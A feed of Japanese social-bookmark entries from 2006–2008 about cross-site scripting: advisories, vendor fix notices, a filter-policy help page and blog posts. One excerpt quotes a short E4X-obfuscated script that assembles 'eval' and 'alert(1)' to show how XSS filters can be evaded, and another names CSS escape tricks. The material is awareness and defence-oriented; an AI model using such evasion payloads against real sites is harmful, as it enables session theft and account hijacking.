<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.ipa.go.jp%2Fsecurity%2Fvuln%2F7incidents%2F&amp;title=%E6%83%85%E5%A0%B1%E5%87%A6%E7%90%86%E6%8E%A8%E9%80%B2%E6%A9%9F%E6%A7%8B%EF%BC%9A%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%EF%BC%9A%E8%84%86%E5%BC%B1%E6%80%A7%E5%AF%BE%E7%AD%96%EF%BC%9A%E5%AE%89%E5%85%A8%E3%81%AA%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B5%E3%82%A4%E3%83%88%E9%81%8B%E5%96%B6%E5%85%A5%E9%96%80">
 <title>情報処理推進機構：情報セキュリティ：脆弱性対策：安全なウェブサイト運営入門</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.ipa.go.jp%2Fsecurity%2Fvuln%2F7incidents%2F&amp;title=%E6%83%85%E5%A0%B1%E5%87%A6%E7%90%86%E6%8E%A8%E9%80%B2%E6%A9%9F%E6%A7%8B%EF%BC%9A%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%EF%BC%9A%E8%84%86%E5%BC%B1%E6%80%A7%E5%AF%BE%E7%AD%96%EF%BC%9A%E5%AE%89%E5%85%A8%E3%81%AA%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B5%E3%82%A4%E3%83%88%E9%81%8B%E5%96%B6%E5%85%A5%E9%96%80</link>
 
  
   <description>
     <![CDATA[
                   サイト内検索               ENGLISH    お問合せ    サイトマップ    IPAについて            HOME   情報セキュリティ   ソフトウェア・エンジニアリング   IT人材育成   情報処理技術者試験   未踏   オープンソフトウェア    HOME &gt;&gt; 情報セキュリティ &gt;&gt; 脆弱性対策 &gt;&gt; 安全なウェブサイト運営入門        情報セキュリティ                    読者層別             個人の方       経営者の方       システム管理者の方       技術者・研究者の方                緊急対策情報     届出・相談             ウイルスの届出       不正アクセスの届出       脆弱性関連情報の届出                情報セキュリティ対策             ウイルス対策       ボット対策       不正アクセス対策       脆弱性対策       対策実践情報            ...
       <a href="http://www.ipa.go.jp/security/vuln/7incidents/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.ipa.go.jp%2Fsecurity%2Fvuln%2F7incidents%2F&amp;title=%E6%83%85%E5%A0%B1%E5%87%A6%E7%90%86%E6%8E%A8%E9%80%B2%E6%A9%9F%E6%A7%8B%EF%BC%9A%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%EF%BC%9A%E8%84%86%E5%BC%B1%E6%80%A7%E5%AF%BE%E7%AD%96%EF%BC%9A%E5%AE%89%E5%85%A8%E3%81%AA%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B5%E3%82%A4%E3%83%88%E9%81%8B%E5%96%B6%E5%85%A5%E9%96%80">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.ipa.go.jp/security/vuln/7incidents/</dc:source>
 <dc:identifier>369932</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2008-06-18T10:00:33Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>web</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>ipa</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>education</dc:subject>
 <dc:subject>sqlinjection</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/web"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ipa"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/education"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sqlinjection"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fhatenadiary.g.hatena.ne.jp%2Fkeyword%2F%25e3%2581%25af%25e3%2581%25a6%25e3%2581%25aa%25e3%2583%2580%25e3%2582%25a4%25e3%2582%25a2%25e3%2583%25aa%25e3%2583%25bcXSS%25e5%25af%25be%25e7%25ad%2596&amp;title=%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BC%E3%81%AE%E3%83%98%E3%83%AB%E3%83%97%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BCXSS%E5%AF%BE%E7%AD%96">
 <title>はてなダイアリーのヘルプ - はてなダイアリーXSS対策</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fhatenadiary.g.hatena.ne.jp%2Fkeyword%2F%25e3%2581%25af%25e3%2581%25a6%25e3%2581%25aa%25e3%2583%2580%25e3%2582%25a4%25e3%2582%25a2%25e3%2583%25aa%25e3%2583%25bcXSS%25e5%25af%25be%25e7%25ad%2596&amp;title=%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BC%E3%81%AE%E3%83%98%E3%83%AB%E3%83%97%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BCXSS%E5%AF%BE%E7%AD%96</link>
 
  
   <description>
     <![CDATA[
       はてなダイアリーXSS対策                             サポート掲示板ヘルプ                  　はてなダイアリーのヘルプ  はてなダイアリーのヘルプ  はてなダイアリーXSS対策  はてなダイアリーでは、ユーザーの皆様に自由にHTMLタグやスタイルシートを入力して頂きながら、クッキー漏洩などのクロスサイトスクリプティング=XSS脆弱性の回避のため、以下の処理を行なっています。ヘッダ、フッタ、日記本文の表示時にHTMLを解析し、はてなダイアリー利用可能タグに定めるタグおよび属性のみを出力します。利用可能タグに設定されていない属性は削除し、利用可能タグに設定されていないタグの場合には&amp;lt;script&amp;gt;といった文字列に変換します。href,src,cite,background,action 属性で外部 URL が参照される場合、URL が適切な文字で構成されているかチェックを行ないます。タグ内の属性値は、「&lt;」を「&amp;lt;」に、といった変換を行ないます。スタイルシート内の「\69\6D\70\6F\72\74」といった文字参照を...
       <a href="http://hatenadiary.g.hatena.ne.jp/keyword/%e3%81%af%e3%81%a6%e3%81%aa%e3%83%80%e3%82%a4%e3%82%a2%e3%83%aa%e3%83%bcXSS%e5%af%be%e7%ad%96">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fhatenadiary.g.hatena.ne.jp%2Fkeyword%2F%25e3%2581%25af%25e3%2581%25a6%25e3%2581%25aa%25e3%2583%2580%25e3%2582%25a4%25e3%2582%25a2%25e3%2583%25aa%25e3%2583%25bcXSS%25e5%25af%25be%25e7%25ad%2596&amp;title=%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BC%E3%81%AE%E3%83%98%E3%83%AB%E3%83%97%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%80%E3%82%A4%E3%82%A2%E3%83%AA%E3%83%BCXSS%E5%AF%BE%E7%AD%96">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://hatenadiary.g.hatena.ne.jp/keyword/%e3%81%af%e3%81%a6%e3%81%aa%e3%83%80%e3%82%a4%e3%82%a2%e3%83%aa%e3%83%bcXSS%e5%af%be%e7%ad%96</dc:source>
 <dc:identifier>68528</dc:identifier>
 <dc:creator>fairy</dc:creator>
 <dc:date>2007-04-01T01:48:58Z</dc:date>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070131%2Fipa3&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20IPA%E3%81%9F%E3%82%93%E3%81%8B%E3%82%89%E3%81%B8%E3%82%93%E3%81%98%E3%81%93%E3%81%AA%E3%81%84">
 <title>ぼくはまちちゃん！(Hatena) - IPAたんからへんじこない</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070131%2Fipa3&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20IPA%E3%81%9F%E3%82%93%E3%81%8B%E3%82%89%E3%81%B8%E3%82%93%E3%81%98%E3%81%93%E3%81%AA%E3%81%84</link>
 
  
   <description>
     <![CDATA[
           <br /> ようこそゲストさん 最新の日記記事一覧ユーザー登録ログインヘルプぼくはまちちゃん！(Hatena) ライブドアリーダーで購読 → &lt;IPAたんからの返事  | IPAたんからお礼が！ &gt;2007/01/31■IPAたんからへんじこない <br />ちょっとつまんないので、つまるようにしてみました！<br />https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=index&gamenFlg=6<br /><br />これで昨日と同じ定型文の返事がきたらきたで愉快かな、とか思って…！<br />あ、IPAのサイトのXSSの存在と実証コードは、もちろん本物だよ！ モザイクかけたけど！Permalink | コメント(17) | トラックバック(14)   コメント一覧Hamachiya22007/01/31 02:31でも IPA みたいなところの場合、たいしたサービスがあるわけでないから、いくらscriptが実行できちゃったりしたところで、脆弱ではあってもセキュリティホールってほどでもないのかも？ どうなのかな。worstman2007/01/31 02:38とりあえず検証コードのURLみますた。...
       <a href="http://d.hatena.ne.jp/Hamachiya2/20070131/ipa3">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070131%2Fipa3&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20IPA%E3%81%9F%E3%82%93%E3%81%8B%E3%82%89%E3%81%B8%E3%82%93%E3%81%98%E3%81%93%E3%81%AA%E3%81%84">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/Hamachiya2/20070131/ipa3</dc:source>
 <dc:identifier>52591</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2007-01-30T17:34:03Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>news</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>ipa</dc:subject>
 <dc:subject>hamachi</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/news"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ipa"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hamachi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070409%2Faist&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E5%AE%89%E5%85%A8%E3%81%AAWeb%E3%82%B5%E3%82%A4%E3%83%88%E5%88%A9%E7%94%A8%E3%81%AE%E9%89%84%E5%89%87">
 <title>ぼくはまちちゃん！(Hatena) - 安全なWebサイト利用の鉄則</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070409%2Faist&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E5%AE%89%E5%85%A8%E3%81%AAWeb%E3%82%B5%E3%82%A4%E3%83%88%E5%88%A9%E7%94%A8%E3%81%AE%E9%89%84%E5%89%87</link>
 
  
   <description>
     <![CDATA[
           <br /> ようこそゲストさん 最新の日記記事一覧ユーザー登録ログインヘルプぼくはまちちゃん！(Hatena) ライブドアリーダーで購読 → &lt;function | Googleトークのすてきなところ&gt;2007/04/09■安全なWebサイト利用の鉄則<br />産総研 RCIS: 安全なWebサイト利用の鉄則 (はてなブックマーク hotentry より)<br />サイト運営者の鉄則<br />サイトからクロスサイトスクリプティング脆弱性を排除する<br />わかりやすいのが産総研にあるよがんばれ＞＜Permalink | コメント(2) | トラックバック(0)   コメント一覧sakesnare2007/04/10 01:33すごいっすねー！よく見つけますね！！bhd2007/04/10 13:09もう、高木先生の日記にトラバおくって先生にお願いするしかないよ＞＜；      はてなユーザーのみコメントできます。はてなへログインもしくは新規登録をおこなってください。  トラックバック - http://d.hatena.ne.jp/Hamachiya2/20070409/aistリンク元368 http://reader.livedoor...
       <a href="http://d.hatena.ne.jp/Hamachiya2/20070409/aist">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070409%2Faist&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E5%AE%89%E5%85%A8%E3%81%AAWeb%E3%82%B5%E3%82%A4%E3%83%88%E5%88%A9%E7%94%A8%E3%81%AE%E9%89%84%E5%89%87">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/Hamachiya2/20070409/aist</dc:source>
 <dc:identifier>71950</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-04-13T19:06:42Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>産総研</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E7%94%A3%E7%B7%8F%E7%A0%94"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.ohgaki.net%2Findex.php%2Fyohgaki%2F2007%2F10%2F13%2Fa_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a&amp;title=yohgaki%27s%20blog%20-%20%E3%81%84%E3%82%8D%E3%81%84%E3%82%8D%E5%A4%89%E3%82%8F%E3%81%A3%E3%81%9FXSS%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%99%E3%81%8C...">
 <title>yohgaki&#039;s blog - いろいろ変わったXSSがありますが...</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.ohgaki.net%2Findex.php%2Fyohgaki%2F2007%2F10%2F13%2Fa_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a&amp;title=yohgaki%27s%20blog%20-%20%E3%81%84%E3%82%8D%E3%81%84%E3%82%8D%E5%A4%89%E3%82%8F%E3%81%A3%E3%81%9FXSS%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%99%E3%81%8C...</link>
 
  
   <description>
     <![CDATA[
       yohgaki&#39;s blog書かない日記HomeContactLog in&laquo; PRGパターンって不必要...防空システムをハッキングか &raquo;いろいろ変わったXSSがありますが...    私が知らなかっただけかもしれませんが、これにはかなり驚きました。いろんな所で問題が指摘されていますが、ECMAScriptにXML機能を追加したのはどうなんでしょうね.... 確かにかなり便利なのですが以下のコードでスクリプトが実行されることはほとんど知られていないでしょうね。&lt;script&gt;<br />123[&#39;&#39;+&lt;_&gt;ev&lt;/_&gt;+&lt;_&gt;al&lt;/_&gt;](&#39;&#39;+&lt;_&gt;aler&lt;/_&gt;+&lt;_&gt;t&lt;/_&gt;+&lt;_&gt;(1)&lt;/_&gt;);<br />&lt;/script&gt;好むと好まざる関係なくFirefox 1.5から使えるのでWeb開発者は知っておかなればならないです。日本語訳<br />http://www.ne.jp/asahi/nanto/moon/specs/...
       <a href="http://blog.ohgaki.net/index.php/yohgaki/2007/10/13/a_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fblog.ohgaki.net%2Findex.php%2Fyohgaki%2F2007%2F10%2F13%2Fa_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a&amp;title=yohgaki%27s%20blog%20-%20%E3%81%84%E3%82%8D%E3%81%84%E3%82%8D%E5%A4%89%E3%82%8F%E3%81%A3%E3%81%9FXSS%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%99%E3%81%8C...">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://blog.ohgaki.net/index.php/yohgaki/2007/10/13/a_a_a_a_ac_a_a_pa_xssa_a_a_a_fa_a</dc:source>
 <dc:identifier>172110</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2007-10-14T20:23:29Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>javascript</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>xml</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>ecmascript</dc:subject>
 <dc:subject>e4x</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/javascript"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xml"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ecmascript"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/e4x"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fhatena.g.hatena.ne.jp%2Fhatenabookmark%2F20060822%2F1156213127&amp;title=%E6%A9%9F%E8%83%BD%E5%A4%89%E6%9B%B4%E3%80%81%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%81%AA%E3%81%A9%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%96%E3%83%83%E3%82%AF%E3%83%9E%E3%83%BC%E3%82%AF%E6%97%A5%E8%A8%98%20-%20XSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E4%BF%AE%E6%AD%A3%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6">
 <title>機能変更、お知らせなど - はてなブックマーク日記 - XSS脆弱性の修正について</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fhatena.g.hatena.ne.jp%2Fhatenabookmark%2F20060822%2F1156213127&amp;title=%E6%A9%9F%E8%83%BD%E5%A4%89%E6%9B%B4%E3%80%81%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%81%AA%E3%81%A9%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%96%E3%83%83%E3%82%AF%E3%83%9E%E3%83%BC%E3%82%AF%E6%97%A5%E8%A8%98%20-%20XSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E4%BF%AE%E6%AD%A3%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6</link>
 
  
   <description>
     <![CDATA[
                                                        <br />                                                                               ようこそゲストさん トップ最新の日記ユーザー登録ログインヘルプ                                                          はてなブックマーク日記  はてなスタッフのはてなブックマークに関する日記です。 <br />使い方に関するご質問は、お問い合わせもしくははてなサポート掲示板まで。<br />サービスへのご要望や不具合報告は、はてなアイデアまでお寄せください。<br />※コメント欄へのご質問には対応できない場合がございますのでご了承ください。                                                                                                                                                &lt; ...
       <a href="http://hatena.g.hatena.ne.jp/hatenabookmark/20060822/1156213127">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fhatena.g.hatena.ne.jp%2Fhatenabookmark%2F20060822%2F1156213127&amp;title=%E6%A9%9F%E8%83%BD%E5%A4%89%E6%9B%B4%E3%80%81%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%81%AA%E3%81%A9%20-%20%E3%81%AF%E3%81%A6%E3%81%AA%E3%83%96%E3%83%83%E3%82%AF%E3%83%9E%E3%83%BC%E3%82%AF%E6%97%A5%E8%A8%98%20-%20XSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E4%BF%AE%E6%AD%A3%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://hatena.g.hatena.ne.jp/hatenabookmark/20060822/1156213127</dc:source>
 <dc:identifier>18846</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2006-08-22T04:34:06Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>hatenabookmark</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hatenabookmark"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fphpbb.xwd.jp%2Fviewtopic.php%3Ft%3D1144&amp;title=WordPress%20Japan%20%3A%3A%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E3%82%92%E8%A1%A8%E7%A4%BA%20-%20%E5%A4%9A%E3%81%8F%E3%81%AE%E3%83%86%E3%83%BC%E3%83%9E%E3%81%AB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E3%81%8A%E3%81%9D%E3%82%8C%20%28EasyAll%20%E3%81%AF%E8%A6%81%E7%A2%BA%E8%AA%8D%29">
 <title>WordPress Japan :: トピックを表示 - 多くのテーマに XSS 脆弱性のおそれ (EasyAll は要確認)</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fphpbb.xwd.jp%2Fviewtopic.php%3Ft%3D1144&amp;title=WordPress%20Japan%20%3A%3A%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E3%82%92%E8%A1%A8%E7%A4%BA%20-%20%E5%A4%9A%E3%81%8F%E3%81%AE%E3%83%86%E3%83%BC%E3%83%9E%E3%81%AB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E3%81%8A%E3%81%9D%E3%82%8C%20%28EasyAll%20%E3%81%AF%E8%A6%81%E7%A2%BA%E8%AA%8D%29</link>
 
  
  
  
   <description>
     <![CDATA[
       本文なし
       <a href="http://phpbb.xwd.jp/viewtopic.php?t=1144">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fphpbb.xwd.jp%2Fviewtopic.php%3Ft%3D1144&amp;title=WordPress%20Japan%20%3A%3A%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E3%82%92%E8%A1%A8%E7%A4%BA%20-%20%E5%A4%9A%E3%81%8F%E3%81%AE%E3%83%86%E3%83%BC%E3%83%9E%E3%81%AB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E3%81%8A%E3%81%9D%E3%82%8C%20%28EasyAll%20%E3%81%AF%E8%A6%81%E7%A2%BA%E8%AA%8D%29">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
 
 <dc:source>http://phpbb.xwd.jp/viewtopic.php?t=1144</dc:source>
 <dc:identifier>84008</dc:identifier>
 <dc:creator>ニャラオカ</dc:creator>
 <dc:date>2007-05-23T11:16:43Z</dc:date>
 <dc:subject>wordpress</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/wordpress"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.i-know.jp%2Farchives%2F2007%2F04%2F09%2Fxss%2F&amp;title=I%20know.%20%E9%96%8B%E7%99%BA%E6%97%A5%E8%AA%8C%E3%80%81%20%C2%BB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%80%82">
 <title>I know. 開発日誌、 » XSS 脆弱性に関するお知らせ。</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.i-know.jp%2Farchives%2F2007%2F04%2F09%2Fxss%2F&amp;title=I%20know.%20%E9%96%8B%E7%99%BA%E6%97%A5%E8%AA%8C%E3%80%81%20%C2%BB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%80%82</link>
 
  
   <description>
     <![CDATA[
       I know. 開発日誌、I know. と FeedGrapher を作っている人たちの日記です。&laquo; CSRF 脆弱性に関するお知らせ。障害報告 04/23 &raquo;2007-04-09XSS 脆弱性に関するお知らせ。Filed under： information &#8212; hiroaki @ 19:57 アンテナ表示ページにおいて、特定の url でアクセスすると任意のスクリプトを実行できる脆弱性があると IPA (情報処理推進機構) を通じてご指摘があり、これを修正いたしました。IPA による確認作業も終わりましたのでここにご報告いたします。想定される影響としては、任意のスクリプトを実行できるため以下は一例となりますが、偽のログインフォームを表示させ ID / パスワードを入力させる、Cookie を盗用する、不正な広告を表示させるなどが挙げられます。i-know.jp を含む不自然に長い url にアクセスした、いつものブラウザでログアウトしていないのにログインフォームが出てきた、等に心当たりのあるユーザーの方は、アンテナ登録サイトをチェックしていただき、パスワードの変更をお...
       <a href="http://blog.i-know.jp/archives/2007/04/09/xss/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fblog.i-know.jp%2Farchives%2F2007%2F04%2F09%2Fxss%2F&amp;title=I%20know.%20%E9%96%8B%E7%99%BA%E6%97%A5%E8%AA%8C%E3%80%81%20%C2%BB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%80%82">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://blog.i-know.jp/archives/2007/04/09/xss/</dc:source>
 <dc:identifier>70972</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-04-10T12:39:16Z</dc:date>
